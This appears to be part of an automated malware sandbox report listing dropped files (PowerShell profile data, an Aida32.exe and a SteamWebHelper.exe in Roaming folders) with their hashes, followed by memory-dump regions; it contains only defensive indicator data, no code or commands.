0aa7a23375ea68302e8cdc0ca8fa020a56b4e74c

SHA256
cd12c5808bd48708772c5cc0b53c07941b643c8115bb8042b30ab96a1ceb61c8

SHA512
4166d67c20f6e7ad2843af73735a42391c2651dd8379cac74b4c09963e592dc475613dcd90280735b55ecdda6a2086c5d5d50b07616d9111a609de48b7fad296

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
a09feb289277c802560d2b15713f1ae0

SHA1
e131f13a795ac53da6f8f6f0b8b8d7bccd490d02

SHA256
e2984fff0e3a44d131ace475f2ed0fab4efa6d4f09335027fc534c7ca5588cc0

SHA512
27a663a178c87693401eb5e4c186cfabf4feb413fb7e6c252aa3de2ce9ea5be14277dd093f2d8ddd4d1701dcabb8ae78bb9246a5c1a45d18ecd937a9dc26deb7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
e88f714c51eb0e3108e5b0ae66ac906f

SHA1
e3fe0a454dd707e22c778fd2dc5f8196c1cadace

SHA256
2bdc2ed70d7fa8e46c1d6474fedc0d995a85f8cfa8c62e3d8cdb7ce8e8a1e90d

SHA512
90f6049b52673633b28322fd9e222dde9494b6ec08de2594110a21205202b274e979c4dd44f08552f0069e1df00bd7b5bb329e335603b44d13f2f5c47d391cc7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
9a7aac5fa61b8f98888ea4717b775817

SHA1
4a7192ae250da51e8ea719d21a7f41670b319ea0

SHA256
9a133f37c5c8da05058bdf18410177b85d292c28f69ad46e9ce3b9ace967cc6f

SHA512
455f79b546d2321382eb0630ae2b9b7d0e63bb3f568f1fd28c245160904e0d306679c6587dbcbc2068d6abc8fbd7ee4f5f7af89df692ffed6ab5363c45a4f834

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
b503e19948814518f21c9869d9a5f03c

SHA1
1286fa1ae250e56aa812183ae0558ad967b4128a

SHA256
3b683a85184d55d56844257648cb54d824e1a2031e50202bde8dc3367cb45879

SHA512
299d6fb7697499991d716e38e8cec980cd9045b007aae858248737617295fad6e3a03922941dd5d32ebf4c149e686d2eeb1df40bb1bc8a40b0fd4b9a7fdc90a2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
c34a6fe3d53436271394048ec9fd5a28

SHA1
a03f652101d2f24ceb58190c0564a50df61cb1a2

SHA256
8a37583c49ffe94be2854f1bd9e3a0b0295cc75d4074cfa3d18f33bd97a7377d

SHA512
86b240425c2a6ed84331f2624ae844908d31da11a0bbc9da76247ca0bf4a18d9d926db4c6e9a9c6cea25706777ca5225c5c8734b01a83721797b0b89ac9cd806

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
2afc7f8f972d80c756469f519957ebe3

SHA1
a2b08d1c68d7c26f52784aa22c1c02cf73453c4a

SHA256
fc8adf84ff2cdbcb64cfbe3e035b9d4286fa1169b052139c168393970bee86bf

SHA512
4d4a28cc652d1c57ebb92670f3474d41c645b3993086d9d132fb23444bbde4382993b50b2d4c919a5ab7307d53c770ad9869397ec5213eddfa84db2da0d1556e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3ac102a242951c2d9c84955d39a30a76

SHA1
d85b46ddcb8a895a384c5399d7de95bb9eba8446

SHA256
c8909b2b4a5366f114b25f4c514ab5faea6d1f61b3cbdcf3f1f2336d7b76a54c

SHA512
8d798c9751c7337907352795b4c831f05da1f3fd966eec5b771f661ec3b59c3f706f90a7d1484763a9b2ba363672927847ebf5cb85f4785683d7abefbea50111

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4ae54c3a00d1d664f74bfd4f70c85332

SHA1
67f3ed7aaea35153326c1f907c0334feef08484c

SHA256
1e56a98f74d4a604bef716b47ef730d88f93aec57a98c89aa4423394cbc95b5c

SHA512
b3bbdefeaadbdaac00f23ce3389bbd3b565bd7e0079aeebf3e4afba892382e1cd3896c00bb2e5a98146ac593f9bdc5568d0bd08c5b0139f0814b1a38911c3889

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9dd876d6004f9e894c7d8de6ae950e5b

SHA1
48f0b4c5f0203788acdeceee62a69df0022dc8d4

SHA256
6e19ea46b5d0c9d58c6fc3c6187e5b821f1600cc25d675d25c8fd829f7194344

SHA512
3f5be2cb27900546eb791f5d5f1274c787f9a4645647b9943a5502c2167ec8a5d9ab653f2efc088d6ea6e8057b63caf3dce0a376f0b88d62f43b68bfa1518324

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
b31ad5512785afb0e2d85cd90a57ebed

SHA1
52d16b5ada1ddfa0b5eef3b3b5b051cd923dd60c

SHA256
7fccda00842a3927937133955f712cb2cb5ed0df897f3ced75d0df9c0a896d87

SHA512
eefd9db714aa8a785fda6d1df9d9fb65abafc80e9e24726ab5b9242e9601ac9db4f8a30a88b9db44e9983be908af678b6a3694fdd42ee6c81c4ecd1834e073a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
2e0391d00f5bfbc34be70790f14d5edf

SHA1
fcb04d8599c23967de4f154a101be480933ab0d0

SHA256
1c0c0c86d7c736fc9fb148ac7cd6e67565dc5b76fa116ae3b000a79e91855136

SHA512
231b9cc6efb928f0748cef04f287d9204c4f7d2eb4bc27f345e9a1afc6d0675057978ca44d1a95334ee2380709aa6dbe74015fedff8f17611a64efcfb9f64d2a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
baf104d57d447f9097b96776dac9151e

SHA1
851007f2f24678985cd4f1d18a8a3152897e7007

SHA256
dc9ad6f143a298155726dc6c81bb2a84a1c00bb1bc629aa064c19dd71e2f2378

SHA512
8f553fe1a698a3904061f87c2011b8d4eb67972855320fccdec51c6a1c2acd26b4a6c988b31d7ed237f9d25385f1603819b8bfae3235dafd382cd8ee72f58704

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e47c3fa11e796c492a8388c946bf1636

SHA1
4a090378f0db26c6f019c9203f5b27f12fa865c7

SHA256
4bb861850395dcc3bec4691e8b9f0fa733b8a2d568d460a9201d65250b12fee1

SHA512
8d4af4eba3019cd060561f42cff11374eafe59da5e5ad677e41d0b9198b87d6d13706e760d13c70574ed1384993a1597f886d21fe6ecd0186379a1e93db30695

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d5bfa8bfa4724309248f8219e3501e84

SHA1
dcdf5cd53a02d97515985215ad46a36feb37167b

SHA256
6f6147c1ea4009c4c19a07b05e43792bdacc48226db2fa3de5189725cdd4964a

SHA512
5c3b486b4c4d715009ff362c33c7b268ee59b9f674217ffef82aa4c704afa6bea14e048f47b095aa62c11d016533d72e89076261068cb793c9a9737b48bef304

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ffbc59d265191e29ec8b34601d8a011a

SHA1
ae9c9451ee4429ed3c1250af6f7bb1a791a7b851

SHA256
52dd5d5b5b5a12fc281aeae7f64fef0104446c9b8fc46128317e35512bbcb01e

SHA512
9745d9ecbf05b7871f7a738e06ba974f1316faaa7a40c75a7ba971987103c743e64f915089f964fd10a04c07e5205642547686aa5f6a5e0af6f8e0ddc067733f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
00bd36561a6192618b0c5122b6ebf557

SHA1
f344b9534d0fe4740ef43d27d2f3e9b158672e60

SHA256
27a0a6f30a8f916248ba5e7cc3d67c114c3c4a2543ab223b313707876fc85fa6

SHA512
9b56e61ff6187cb7d4d4509377a629707598d200939f53c9e9641a32133c180d62d81adef68ce7c28421321e5368930a9bc328770102b1c00480f41dffd486ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4397b0d1a82fec8a95f1ab53c152c5a5

SHA1
3632ed4f2b65fd0df29b3d3725e3a611d2e1adf7

SHA256
10cece13749ac090c815e53dc5e248b4b9c3ba93dc3d434d97d22f12a3906734

SHA512
f0d21ab75d08e1cb4ac83507f9ca41ef5365027b0d7e27747ded44b76fdb0346ca2d7499697802c5b67696e0c73716fcfab698825a143515151001690804d59f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62e3a28803bfe1a792e7e4feb2c2e13d

SHA1
fd20f935e5e4518b602fef727ebcb3575d42845d

SHA256
da8da9e59035f93f6c72df7d2d04ec4f1adf7e3423e46925cdd1317019ccb51f

SHA512
261c6e1cb11d11e2bbf9c7f401a681b4da40c5be5d8052b5a086cffdd8d04c3c6a702fa5c88232c70ab6ce2a880c34d05be4e1bb7a83a675f38ac9cb1e35685c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
29145a87544628ce56761358c4b41600

SHA1
34342de0f0083c72323e5c8cd85f53fe3bf22dcc

SHA256
243e604ed56f762301c6a894a399a2cb27a35e8bb5894c956392e6109d731356

SHA512
2850d64a10cb8f8f33030aaeb55a2a8b1e3771b0c95c7181a1e9a231934f509a30ce1383996b0d2ac6d734b7dbe62a99cad570937b05e0e6060d8be5daf52647

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
eb6bbad04121efc4b28aafcfb2098c9b

SHA1
874882a3749c41301505e95510f761491c465073

SHA256
bdd1eb4ef60661fd7570aa4f6454ffe1072f57d213dd7263f89dafceee0e5bd5

SHA512
7ade89430b42f124403449f4b8146ea4daad3bf87a53fe6aacdb28d759ad759ad6ea88db61723c1fa9c728d0d3c7aafa13527d15cf7149abbb4fa4fb4eb459d3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
f5f50dfef68e73a609081bf7d15dd4dd

SHA1
504dc10ffbc79da870a44a3e14b2e197158f2099

SHA256
9adc8213c21ccf63bacdb7c7d46ae0e845ade9959a64b77ba5b2729940906658

SHA512
8586daca9d0ade612c872e483cf23a44e08993207d938cb86c6caec3a2f57184122732c1d28949246878ba3e849223f21fc5ca007ed70cbd122940d80743b5d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
3427f53b75c39c8788a4f1b3b63dc441

SHA1
a96cb5015c0a0826508d597f2a78ae80a8d7a2fd

SHA256
e467235ad6861644df397e5437cad29b059a9f0b9f25b7fc53341694bcd6c5a5

SHA512
8664e0605e272be1aedb3ce02c9f2bab83496ae14aefd293f935df1b5aa2dea69c099faa566d985d6e8393cc6fb1af9896e0fe5e6bf6a0a3b483a24bbd19ec72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
c6121e0c42fbe0338296040197abfe3f

SHA1
ba2d9897aa20d62e2c63fdfe041d4996cdd9a03d

SHA256
4d19541e2be70f2aad98180ad59670e499b790a0c47915d1e0a47fa0389b420c

SHA512
de07b297e99e79cf997f08cff4c209353282e66b531d8a7473075a8fa385c3b22a2f423a86e7c1204feaf998667636029cf42243660bbb5d9e5039c968b5d3ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
325bb9d13e6126874e9960c2cecde70c

SHA1
22190e7cef0c7eb06285cc86375f99783252976b

SHA256
f9acc680a7646a4172a58ddea5e76ef16bde2591b2d641d5b76f2391f68bb353

SHA512
3439d80be21523319d8e025067b7c27a3e5bfde98d672404682420239f3d82ed44a7175d1cc7153c323e6e444b0a62ea69d113f7a93eb0f2579d3e32271afd86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ae43630f0e86ffec2cfcd0f471c759f0

SHA1
d56563c5147b846e1e4f2f5323a94193f36b1e4d

SHA256
1eef6ce7ea03db8158daec0389129068ff2a710be5a75272bd6212d524445da6

SHA512
a17031c6692a1c99efab59b590474d22fd22f01e3181d9016e8fab8abe73ad3ca95368e51e36c1a8f840422d3194052b8c649af5c9634df172efa3b529bc5c55

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d2c78e18a24e8fd70a9ae0577c4f73e3

SHA1
4c26092ba229ac34481347392e0fb506203b14c9

SHA256
23ad76eb8552b13d951b5762c2af3f2b2fff99593a0b438ec6759c5b196f8cee

SHA512
fb6c32379b0f78749b68b6bf38aabcc90ecf0159e430727849e3d96821f26cf3f4c7c62ed2b71e37c4c17594cb62228535e300984273ba0f1754746ecea434d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1gqm3msw.fdi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\AidaAV\Aida32.exe

Filesize
30.8MB

MD5
04cc85c458298af28fb05f003bd6f374

SHA1
6e01ea30bb7178409fd33324c5e6455c85ad923d

SHA256
03429c7ca012aecd12e1ec88398f6e8eca961a8cf5537c3d7683c6887f17a2ae

SHA512
7b3aa398518722449f60d15ed6634f18812eca0e1f0d8713daac43d4836936eaf50afd306ed3a01ebb97bb6b80429bb3610dce17cb47e5fd40b2a56a4478887f

Download Submit
C:\Users\Admin\AppData\Roaming\Steam\SteamWebHelper.exe

Filesize
139KB

MD5
25ad124237ddd42fb26bfa9a18261f25

SHA1
94f74941d3e5370e2301783054c5773d58609738

SHA256
456e789acbfd8683ad2d57ddeb991a7fe7bcff910a1c56dcdcefc163e77019da

SHA512
3b361a42f654a34c76c5f6d20ab7a0e70fcafa3bc2fa7aea25d52f2e17ad63ddac367fa0b37d581f00195184875e8ac409bf79c71eab1404d4ac52477ffe81a0

Download Submit
memory/1412-580-0x00000140B45B0000-0x00000140B45DA000-memory.dmp

Filesize
168KB

Download
memory/2588-42-0x000000007446E000-0x000000007446F000-memory.dmp

Filesize
4KB

Download
memory/2588-49-0x0000000005B50000-0x0000000005BE2000-memory.dmp

Filesize
584KB

Download
memory/2588-48-0x00000000061F0000-0x0000000006796000-memory.dmp

Filesize
5.6MB

Download
memory/2588-47-0x0000000000A40000-0x000000000103E000-memory.dmp

Filesize
6.0MB

Download
memory/2588-59-0x0000000005AE0000-0x0000000005AEA000-memory.dmp

Filesize
40KB

Download
memory/2716-58-0x0000022BB8D20000-0x0000022BB8D42000-memory.dmp

Filesize
136KB

Download
memory/3528-786-0x000000001C620000-0x000000001C63E000-memory.dmp

Filesize
120KB

Download
memory/3528-784-0x000000001BC60000-0x000000001BCA6000-memory.dmp

Filesize
280KB

Download
memory/3528-785-0x000000001BCC0000-0x000000001BCCD000-memory.dmp

Filesize
52KB

Download
memory/3528-787-0x000000001BCD0000-0x000000001BCDB000-memory.dmp

Filesize
44KB

Download
memory/3616-621-0x0000000002850000-0x000000000285A000-memory.dmp

Filesize
40KB

Download
memory/3616-626-0x000000001B220000-0x000000001B22C000-memory.dmp

Filesize
48KB

Download
memory/3616-625-0x0000000002870000-0x000000000287E000-memory.dmp

Filesize
56KB

Download
memory/3616-624-0x00000000028E0000-0x00000000028EA000-memory.dmp

Filesize
40KB

Download
memory/3616-622-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download
memory/3616-620-0x0000000000560000-0x0000000000668000-memory.dmp

Filesize
1.0MB

Download
memory/3640-623-0x00000000082B0000-0x00000000082CE000-memory.dmp

Filesize
120KB

Download
memory/3640-618-0x00000000047D0000-0x00000000047E2000-memory.dmp

Filesize
72KB

Download
memory/3640-614-0x0000000006C40000-0x000000000716C000-memory.dmp

Filesize
5.2MB

Download
memory/3640-629-0x0000000008360000-0x00000000083C6000-memory.dmp

Filesize
408KB

Download
memory/3640-613-0x0000000006240000-0x0000000006402000-memory.dmp

Filesize
1.8MB

Download
memory/3640-612-0x0000000005FF0000-0x0000000006066000-memory.dmp

Filesize
472KB

Download
memory/3640-611-0x0000000005F20000-0x0000000005F70000-memory.dmp

Filesize
320KB

Download
memory/3640-607-0x0000000000400000-0x0000000000474000-memory.dmp

Filesize
464KB

Download
memory/4240-555-0x00000000008E0000-0x00000000008EE000-memory.dmp

Filesize
56KB

Download
memory/4604-615-0x0000000000400000-0x0000000002317000-memory.dmp

Filesize
31.1MB

Download
memory/4604-617-0x000000006FC40000-0x000000006FD3B000-memory.dmp

Filesize
1004KB

Download
memory/4604-616-0x0000000064940000-0x0000000064956000-memory.dmp

Filesize
88KB

Download